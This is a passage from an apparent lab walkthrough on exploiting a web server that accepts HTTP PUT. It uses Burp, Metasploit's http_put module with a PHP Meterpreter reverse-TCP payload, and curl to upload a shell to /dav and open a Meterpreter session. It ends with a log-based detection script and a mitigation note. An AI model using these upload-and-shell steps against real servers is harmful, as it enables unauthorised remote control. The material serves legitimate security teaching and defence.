![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ZwOoTL28hMg/W77rjvwmKPI/AAAAAAAAapY/bbI2afPf4NEQzq_uPTGcXGrE3LG4m2QvQCEwYBhgL/s1600/13.png?w=687&ssl=1)
In the highlighted screenshot below, we observe two panels, left and right, for the HTTP Request and HTTP Response respectively. The GET method can be seen in the HTTP request; we will now replace GET with the PUT method in order to upload a file named burp.php containing the malicious code.
Type PUT /dav/burp.php HTTP/1.1 in the request line and paste the malicious PHP code into the request body, so that the PUT request writes the file into the dav directory.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-qQhk13RoVhw/W77rjxnWxjI/AAAAAAAAaq0/8iBXssgaXX8I2-NiSK_TyR2PibAWuE5lwCEwYBhgL/s1600/14.png?w=687&ssl=1)
Verify the upload by browsing to the same URL, 192.168.1.103/dav, in the end user's browser; we can see that the burp.php file has been uploaded to the /dav directory of the web server.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-AyBQmVxBQAU/W77rkCU45NI/AAAAAAAAaqs/cfwoBynG2s8BW8C_tjKKEtDCtOKXkBmNACEwYBhgL/s1600/15.png?w=687&ssl=1)
Simultaneously, open the Metasploit MSF console and use multi/handler; then go back to the previously uploaded burp.php file and run it. This will give us a meterpreter session.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-847UTwuj7Ic/W77rkILqtQI/AAAAAAAAaqo/eGJGmT_PuNoKNwT5JUwRk8k7n20swx4EwCEwYBhgL/s1600/16.png?w=687&ssl=1)
Metasploit
Metasploit Framework is a well-known platform for developing, testing, and executing exploits. It is an open source tool for performing various exploits against target machines.
Metasploit has built-in auxiliary modules dedicated to scanning HTTP methods, and auxiliary/scanner/http/http_put gives us the ability to PUT a file. This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests; set ACTION to either PUT or DELETE (PUT is the default). Below are the commands to accomplish the same:
msf > use auxiliary/scanner/http/http_put
msf auxiliary(http_put) > set rhosts 192.168.1.103
msf auxiliary(http_put) > set payload php/meterpreter/reverse_tcp
msf auxiliary(http_put) > set path /dav/
msf auxiliary(http_put) > set filename meter.php
msf auxiliary(http_put) > set filedata file://root/Desktop/meter.php
msf auxiliary(http_put) > exploit
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-UgEr2Yr62zc/W77rkVegsHI/AAAAAAAAaqw/_g91tLVqKZYk0Xdok8MV99PNwXs5Wf_lwCEwYBhgL/s1600/17.png?w=687&ssl=1)
Open the same URL, 192.168.1.103/dav, in the browser. As evident from the screenshot, the file meter.php has been uploaded to the web server.
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-tOZRLMDQ8y4/W77rkhs-ilI/AAAAAAAAaqw/0spu0p-6fxoFpSortWVf99HYJLKHPMCVACEwYBhgL/s1600/18.png?w=687&ssl=1)
Simultaneously, open the Metasploit MSF console and use multi/handler; then go back to the previously uploaded meter.php file and run it. This will give us a meterpreter session.
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Xtw0_4WL1GE/W77rk6gdCyI/AAAAAAAAapw/gipaCNagefk8ru9lpgGvVpT76WErG4p4wCEwYBhgL/s1600/19.png?w=687&ssl=1)
cURL
cURL is a well-known command line tool for sending or receiving data using URL syntax, and it supports many well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet, etc.).
To exploit the PUT method with cURL, the command is (<target-URL> stands for the upload path on the web server):
curl <target-URL> --upload-file /root/Desktop/curl.php -v
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-FXYI2gJx5aw/W77rlHUWziI/AAAAAAAAaqk/rXCIGrnnUJs8dvw8k2VQ39-m8V7CvmBewCEwYBhgL/s1600/20.png?w=687&ssl=1)
Open the same URL, 192.168.1.103/dav, in the browser. As evident from the screenshot, the file curl.php has been uploaded to the web server.
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-_KL9pTHjtSA/W77rlh45foI/AAAAAAAAaq0/uh8M3MDSSHEVwtbg8Kh5oPHtvJjphLX8gCEwYBhgL/s1600/21.png?w=687&ssl=1)
Simultaneously, open the Metasploit MSF console and use multi/handler; then go back to the previously uploaded curl.php file and run it. This will give us a meterpreter session.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-UXj9gK3LABE/W77rludV3UI/AAAAAAAAaqo/LSN6R3rE2N0fyFqjQtnVFYFoa8y-jHMwgCEwYBhgL/s1600/22.png?w=687&ssl=1)
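Every one of the four methods above leaves the same trace in the web server's access log: a PUT (or MOVE/COPY) of a script under /dav answered with 201, followed by a GET of that file, which is what executes it. The following detection script is an added example, not part of the original post; it runs over constructed Apache-style combined-log lines and rates exactly that pattern, and the log format, method list and file extensions are assumptions to adjust for your own server.

```python
import re

# Apache/nginx "combined" access-log prefix (assumed format; adjust the regex for other servers).
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# WebDAV/HTTP methods that modify the web root, and extensions the server would
# execute rather than serve as static content (assumed list, extend as needed).
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
EXEC_EXTENSIONS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

def find_webdav_writes(lines):
    """One alert per write request. Severity: accepted executable upload that is
    later fetched (i.e. run) -> critical; accepted executable upload -> high;
    other accepted write -> medium; rejected attempt -> low."""
    alerts, pending = [], {}          # pending: path -> alert awaiting a GET
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                  # malformed line: skip rather than crash
        ip, ts, method, path, status = m.groups()
        status, path = int(status), path.split("?", 1)[0]
        ok = 200 <= status < 300
        if method in WRITE_METHODS:
            executable = path.lower().endswith(EXEC_EXTENSIONS)
            alert = {"ip": ip, "time": ts, "method": method, "path": path,
                     "status": status, "accepted": ok, "executable": executable,
                     "executed": False,
                     "severity": "high" if ok and executable else "medium" if ok else "low"}
            alerts.append(alert)
            if ok and executable and method in ("PUT", "MOVE", "COPY"):
                pending[path] = alert
        elif method == "GET" and ok and path in pending:
            pending[path]["executed"] = True   # the uploaded script was fetched, i.e. run
            pending[path]["severity"] = "critical"
    return alerts

# Constructed sample log lines mirroring the walkthrough above (not real traffic).
SAMPLE_LOG = [
    '192.168.1.50 - - [13/Oct/2018:10:21:07 +0000] "GET /dav/ HTTP/1.1" 200 512',
    '192.168.1.50 - - [13/Oct/2018:10:21:30 +0000] "PUT /dav/burp.php HTTP/1.1" 201 0',
    '192.168.1.50 - - [13/Oct/2018:10:21:45 +0000] "GET /dav/burp.php HTTP/1.1" 200 1',
    '192.168.1.77 - - [13/Oct/2018:10:22:01 +0000] "PUT /dav/notes.txt HTTP/1.1" 403 0',
    'not a log line',
]

if __name__ == "__main__":
    for a in find_webdav_writes(SAMPLE_LOG):
        print(f'{a["severity"]:8} {a["ip"]} {a["method"]} {a["path"]} {a["status"]}')
```

The mitigation the same alerts point to is to remove PUT, DELETE and the other write methods from anonymous access on the /dav location (or require authentication for them), since the upload is only possible because the server accepts the write unauthenticated.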